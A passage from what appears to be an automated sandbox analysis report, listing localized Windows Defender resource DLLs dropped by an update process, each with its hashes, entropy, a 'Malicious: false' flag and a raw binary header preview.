SSDEEP:	1536:xpxOZnyXwfxnt3dpErZJ2QmPEP+f9Xzus:hYnTxn6lJpmPEWf9XB
MD5:	4E1AD46B193CF0342CB642491399B2FD
SHA1:	C8926CB828894506CD1BA0C8571E0A41EB36633F
SHA-256:	5DB786F7D9E7DB54C9AB31E904D15D8E21D878A11C1C83F4A6CD0BFF4B895858
SHA-512:	C8D18BF0FFEFE581235C35176F009FCE6402CACFBEC26454C5BF41C335CDBE77882D651FB58EC7C70F1FD6B926CCC49698D24928B78E288A7D78CBCC594F53F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................'....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-FR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34056
Entropy (8bit):	4.999683595968667
Encrypted:	false
SSDEEP:	384:DG7lTBmcFbVSP+eAOiDptyzxEInMNPxaWSa/WmDBRJXleLR9zusk2Ibmfj:DGJAcFbVSP+eAT1axTnAv1P1ed9zuzg
MD5:	30E143CB27218928A455917D63436ACA
SHA1:	3959B6311C33C982BDC7702D202BBD6905A3A7BD
SHA-256:	6A62A4EE6AA3C2F04CC83A82A87B2D1A0969D4CAAAC4053CF7978795358FA1D1
SHA-512:	6E52CE8ECF847D95A881A8BD8C1AFC8620E5705738E7D25799A1C9858A998493C5B9631E6C138E5922C499C7705D1E42CD4D2D223FD0126B90FBD0FB86A5E01C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........^......................................................f.....@.......................................... ...Z...........`...%...........................................................................................rdata..............................@..@.rsrc....Z... ...\..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...U...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ga-IE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.0308382975851575
Encrypted:	false
SSDEEP:	768:9fkC172Vaov3ePwXclQyQ1P450Zi9zui/:9fkC172Vaov3ePwXcZIPYzui/
MD5:	75738977EB1597A31B119F9C8A405B7B
SHA1:	F2CA11EC2570C07B231119F24E6B94F7FBC512A2
SHA-256:	C73D7A6CCFFFE3F0A999DE6EAD17D40CFD38F2E975465D04BE9E22B0B520C2FE
SHA-512:	7B333BE921EC2D40B5981F451AF2004DF52A464C2FFEAA69E55C042EE5D5B5E44E825F91244E6A7831FAE27ADAA64E5A78F297F01ADC9E126465CD1CE1EFD519
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X......................................................%.....@.......................................... ...U...........Z...%...........................................................................................rdata..............................@..@.rsrc....U... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\gd-GB\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35600
Entropy (8bit):	4.936353753314318
Encrypted:	false
SSDEEP:	384:aSZJ1V46vRsF0rPLEf8Zq4DFvjQIVWSa/W4DBRJXWF//dJR9z3sEAl7:PV46vRsF0rzE4DF7QF1PXWF//dj9zlAd
MD5:	9052353B2920BBB8DFF3E55AB633EDE3
SHA1:	ADD93A8F42780423161D4B4BEDEE6555EBCE27B6
SHA-256:	1EE80518AF9BA4CB75DC4F00F2F7003EEA2DD049C40CE8071BE13DF516700D9D
SHA-512:	652389E2DAE3BF1613D932FC246BBACAA163EB00902AC77CDDE01610DD8F5B33ACB9FE003B3C07B59C88BB969A5A642B270B67B0B4AFBE94D945B137DE52AA8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........d.......................................................\|....@.......................................... ..D`...........f...%...........................................................................................rdata..............................@..@.rsrc...D`... ...b..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..p[...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\gl-ES\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.07280623303532
Encrypted:	false
SSDEEP:	384:1cpODgKuoqwIhlL5L9Yw+71aWSa/W1DBRJZpk5+R9zusyDrN2:SADgTRVx9+7rQ1Pog9zuLrM
MD5:	589DCF85E945DC13B7F927603720C6C9
SHA1:	E392A47792297211E1E9F8A2D9888D5BF292D240
SHA-256:	95595A9F06C814403AAC2A6A2AE423FAEE905A55D5FA5775C638AA74D2FE27D6
SHA-512:	775DB35AAF78D3914DB24EF6636FD9AFEEE069C0BD35F0B8CDBF7C3D9BF61BC7A1C9D4C764C7B7D1E52386495AAD579B1237AC1D38950DBA818B8D7CA68FF670
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V......................................................Q.....@.......................................... ...R...........X...%...........................................................................................rdata..............................@..@.rsrc....R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\gu-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32528
Entropy (8bit):	5.609485981891888
Encrypted:	false
SSDEEP:	384:/MUC2PP0im6PCGN5H6NbJNz6N6PNUR+gpbudPaaPfWrqnelWSa/W6DBRJGWF//d6:kp2QPUyff8S7v1PGWF//dj9zg
MD5:	A1A90117EDF2621032CE9C57F78C4E62
SHA1:	7E092E9D24FD6C3B154424935ECAF43B50B6D7C0
SHA-256:	D2191443511A0CE846FE2E12E27D8E4758E7B963B2EE76FD402DF2900C4663D5
SHA-512:	1C28D8BE8F0DEA1F4CFF40EEC794016A2796A7FF86F6A354DBADF6DAC85DF35C33901D58EDB247C73C0300D316E754A0AB50CB7FFF12723EF7E0ADEE6DE49B1C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X.......................................................F....@.......................................... ...U...........Z...%...........................................................................................rdata..............................@..@.rsrc....U... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\he-IL\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54032
Entropy (8bit):	5.029705755301212
Encrypted:	false
SSDEEP:	768:CYfhHn74xfLs/HpZU4vKZTfS1P+Xzg9zc7:Lf174xfLs/A4iZTfiP+DozK
MD5:	3A55455E225DD8AF0EBC86B35F206028
SHA1:	466F4F8916BCC51D588319A5F1A734DE1C9D0192
SHA-256:	CA423DD500D09B652F49EEE105AB5EBC78B780B3FE9048C36EA0CD171EB95F55
SHA-512:	AFFBC9A22699F476DD285D2AC2F0067E4C1482643C27AEC42F917142B4CDCBBE020AF164D281C509AED6BB84C9348243FF647CA534C02A0BB688BB381C82B81C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................\....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\he-IL\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26376
Entropy (8bit):	5.864619614870259
Encrypted:	false
SSDEEP:	384:w+5m5vBqqY/77a2aka6anxqWnC3G+V7Tw/mwzFVw8w7mV5MjAuzqMJiWSa/WCDBv:Lmj56w/mwRVw8wh8S1LD1PDQP9zuhnV
MD5:	F1B66A185D1C46C2A59D5372FEAB9736
SHA1:	E54A3A0E1ADAFC9D0BF68DE6BEA09C2F76845A2D
SHA-256:	0CF2075867D5607E466B3AE5333C100B2BF0317012848A85030A788657EB4A22
SHA-512:	FD1DBAD9E155FC1C7D185CA68B13794235B275277673E31A002E4BFCE2D8639BDD15DE440E98B30B9ACAA7B88CC9D63A5CB6B31EA22261C8FA8BB71240FEEBEE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........@...............................................`......R.....@.......................................... ..H=...........B...%...........................................................................................rdata..............................@..@.rsrc...H=... ...>..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..X8...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hi-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33040
Entropy (8bit):	5.520709924759126
Encrypted:	false
SSDEEP:	384:H/HM90BTKvKjKkZT4HzVXavAKgVxwhWSa/WgDBRJyGRi9XzC/R9zUCPm9:fn+kZT4HzV0aJ1Pbi9Xzg9zVo
MD5:	BF5D443C64363A9F7CEFD7A091E7182E
SHA1:	0E410D4DB9895D85C4A59F489A2367F877E9A405
SHA-256:	1F967513337D79B7D5F83047B5F4EA192536332E2A9B71AC4F6D402388AE0718
SHA-512:	32D5E739D024834A7833876379050A2D74C4CD1DEC661FFC89A6E0868EC4BE2E7EDB1C1C2E55498470B0EBEF1D17212A74B509E115A24556DAA699E47FB3B60B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z............................................................@.......................................... ...W...........\...%...........................................................................................rdata..............................@..@.rsrc....W... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...R...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hr-HR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66320
Entropy (8bit):	4.335174667648838
Encrypted:	false
SSDEEP:	768:dVKd6A7H8nrUt4IL1DhIzSlav/BSmaisCAXy1PNnT289zD:rKd6A7HSEhIzSlav/BiXCPNTFzD
MD5:	E90E252A69226A2E53E691439D58C83D
SHA1:	D01C1D04346E7AFDD4F074DE42521CDF5DA5FD11
SHA-256:	23283483EB730421964C9ED27FE463EF91FAA3891B6B69AA7E13DA4CC2AE232A
SHA-512:	B44E403379AADD569F0C67834BAD8C034A7C006E844210891F60FB0D95613C3A6BF45F9A5706911E6E786BC1E277F9875482EF07D635742DCB39DBA5816FCA6D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................{....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hr-HR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.124539255047616
Encrypted:	false
SSDEEP:	384:xyLG3hYi60LD9hm2N61NZS1NlU2oP4DnhWSa/WyDBRJ7cleLR9zusk2Ikr:kLGZ22N6o+71Pyed9zuz+
MD5:	47795C8AE55B6444C16FFB75AE956C0D
SHA1:	40992C79F229AB9CF66D6CDA70D4B86FC38020E1
SHA-256:	81A0F3F1D0F54B48B143DA33D13633F1BCF2B32C4AA8B48A696145274FC0D560
SHA-512:	1D5CD96D5CB2A63E70835290D5B21E0D3E6563289A910F3A21D3059DBAB4E9AB506C977579325045CF1348FB8D2B7B918532ACF3C73F667C2D407CD4829E7432
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T......................................................m.....@.......................................... ..HQ...........V...%...........................................................................................rdata..............................@..@.rsrc...HQ... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..XL...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hu-HU\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68872
Entropy (8bit):	4.429304268434987
Encrypted:	false
SSDEEP:	1536:6/5upgBSeciRCGCgqbSvbCzQyak6JGbTPIeon/vYnkrFVueLgEcjgeWu/QQQluQ/:6/ygBtciRCGCgqbSvbCzQyak6JGvPIeo
MD5:	3D33794805120CD1E0895E387B717008
SHA1:	A74E31D81A6CB28D84256D3A75985659350B1645
SHA-256:	2C95C8BCE8AC6525A271A7B1EEA5A98C9D9955061AFCACAC2C591776BC3A3490
SHA-512:	A3A89CBD2C70EDDB2F88A4FC17B58DF5D6B59645BDFDEC61E72EBA5796A2DAA587A841FA3ACAC860DE60043A68E1EE024633F8D5384D46BC8DC6644F28BCEE38
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................P.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hu-HU\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56592
Entropy (8bit):	4.6232780235176225
Encrypted:	false
SSDEEP:	1536:zBAfDrIaqK9yZqryQgncnxBthBBPWZFgbrf6AEfBF25MugzJUIul0id3PwNpzc:zBAfDrIaqK9yZqryQgncnxBthBBPWZFa
MD5:	177637365BB53D3B14BF2E3AFFE48D0E
SHA1:	78CC5F8B53D32322A91DE949CF4F30C5F0883FEF
SHA-256:	5034BC41E8F725818E8C940DD8C791165A59C3AA8656A83EBF286C54710302DD
SHA-512:	6A8326F3CCF03A90B232F9AE53D57FCA16C87F3508E90D0A920B510373D55654D00B1AF6FD0D3D59503D8035D916ABA613F9A2405BAD3B9923EB5B9D93691F24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\hu-HU\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.189106765027743
Encrypted:	false
SSDEEP:	768:L++8VLAW1m5H1ctjfJ0z4Sp80eu/WgJvvwdWtjB6v1Pw3l9zuAC:q+8nu/W7tPwHzuAC
MD5:	87C10600CB5EC95EB4654084D57D725B
SHA1:	34EB945285D55940EA144846BE7C872D668E4B1B
SHA-256:	708FF383E8E88B4B3F555970C4A0836FE88D3C0C592F99839F129BC8970725FC
SHA-512:	7FC70B7BD9B2174CF7D7C8D67D3B8293A7D0568A29CD02C6487D51E38EBE27D7D9784268CDA5A8B140309EA8956C9AEF931E8635260932622FFD06E3C7B88C7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X......................................................9.....@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\id-ID\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65288
Entropy (8bit):	4.292436035559608
Encrypted:	false
SSDEEP:	384:UqJCt4+luBxQRliqd9bvgcSm9OVHYJVcUzNJe8sCLq1XmkWfivhKl/s7kKl2aqw1:NSIo1OqcUX9Hqvwl2rp1PCg9zu0
MD5:	BBE24FAADFC575D5ACB13EF9B8BBB5E2
SHA1:	9B52D5B289C18634BC106A0F67FA76EEB645209E
SHA-256:	E0D27DFB9B327E29419135F53DC98444196A7485FA9A9EC6DFEC2D7117224F43
SHA-512:	1A5BC48DB22E697357230D4C334B74D2773AA71B847A01BF632E32BC947A586EF24260D677203AA391ABAAF493E51E650582C6DC34B5EE97DA824598199FECAC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................z.....@.......................................... ..$................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\id-ID\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.107997723934593
Encrypted:	false
SSDEEP:	384:IBnZAd/QGhxBb3cgUo979O/FCL9ARQnrT9WSa/W4DBRJNc5B5u2vH3rPR9zus8qc:ORfK8N1PNcb3l9zuAcT
MD5:	5FBDBF3EC3706A856DB45B93CA5ACE94
SHA1:	B2AC37DC6B2CEB91B8923DCB3C4AC73B70E5E159
SHA-256:	493D2F81B2A850C4E55AEC368D6022492E71801A35F51DAF3BBE6BEE1A957B62
SHA-512:	F59464282AFDFD431A280D9A1BC8B4323BDE4644420936772B6A94A873216789E049CEA81395CCB7DE41D27BF3A9869BEF3FA2D6227A4841691C3C4403C69244
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V.......................................................B....@.......................................... ..,R...........X...%...........................................................................................rdata..............................@..@.rsrc...,R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..HM...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\is-IS\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29960
Entropy (8bit):	5.231485745297082
Encrypted:	false
SSDEEP:	768:7o68FdEF38Id8ZdB+8QBn5CBSdQ3dQ0kJpPvdoZoTdYYkMv1PXfWoF9zuTG:N8FdEF38Id8zB+8QBn5CB+QtQ0kJpPvL
MD5:	39A3FB0F7772B261249C1CCF5E0B9276
SHA1:	756A1E5767F7ECCE068C8BA717B7BBEEB1A15947
SHA-256:	F6DA73530F1E09DF310FB9962EDDA2E4F4238EBFD728EE94976137CB30D673F0
SHA-512:	303BD2F791ED072EDD26927EB03E9993853840FE769457A441C3E0CF66445CAE6C1CFA80D8E9595EB7BA376014B4E966D3F1070710DA2899E5AEDEB2D6AA994E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........N...............................................p............@.......................................... ..`K...........P...%...........................................................................................rdata..............................@..@.rsrc...`K... ...L..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\it-IT\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68872
Entropy (8bit):	4.2056295988028065
Encrypted:	false
SSDEEP:	768:wM/dO5unVXqYTzA/GzKXPayGwwFiGgkbjYYGf415oc1PeMufiC9zuukP:qCp8/JXpQi+No8PeVzuP
MD5:	E1688630D4269B7491A3730248E23C14
SHA1:	DEC063C2ADBDD3E0F428EF62B494E28319A49344
SHA-256:	EA8A09AB6309D5DA62ED25224C3E1FCE5859C4DB7B1B1863532CC9FAC7BFF46D
SHA-512:	C9284684E10CE9194512EFF03EEDCBDECD26E4184560761FE6ACE2DE51C1722F52D2C214BEF24380EE2DB9870FDED99FE1580EF0EC1A971DCC441F262449B72B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\it-IT\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58120
Entropy (8bit):	4.46167853240393
Encrypted:	false
SSDEEP:	384:h1CfOuV52WS/ZbMTWm0M6I58icRb2gGEo2AXJTT5dhZmt5rrqS/BWaPDBRJHy50j:hsV52WSNcTmt5rrZ/rP1PS50Zi9zuihS
MD5:	FA31FB6BC23E7AFB79120BF174500B81
SHA1:	42568EC6D2D47A1EBFAEEEBB27F973C8D913C20B
SHA-256:	6BCF92FB13FBD5B2E2E51BBD6CC4F8C7540EE1E228AA307EEE7C4631ED185C59
SHA-512:	EE1C97DC697ED045D39FFD7A4B64A1A4E887073550B38D236A06B691A37111527E2F8BFE6F4AD068F56C469514ED7FE3AEE753AFCA10D4468D87F9BC6835D847
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................u....@.......................................... ..t................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\it-IT\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57096
Entropy (8bit):	5.683901187201174
Encrypted:	false
SSDEEP:	1536:U02Zw0lyY/lxbdhpgyaQSa3Bx3PPzd8zuOSq:v2ab0DCyZBVPba5f
MD5:	61C553B0596CA6ACB06DEBA2BED80629
SHA1:	43F31CBD8F35FC6C61E1D68D8F689D7DA884EFDC
SHA-256:	885C16AFB4338B56861EF232B57587937CFC6B928732400756122329CAA31F74
SHA-512:	07AF5C4873BD5B38F51ACA5F40AD45B8C2A79FA431F1BE47BC98AB53948458857B5246056BCBBD78FD17283DBC00F0DA434D021A8C3F769A6A8F6B91A6443EF8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................<.....@.......................................... .. ................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\it-IT\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
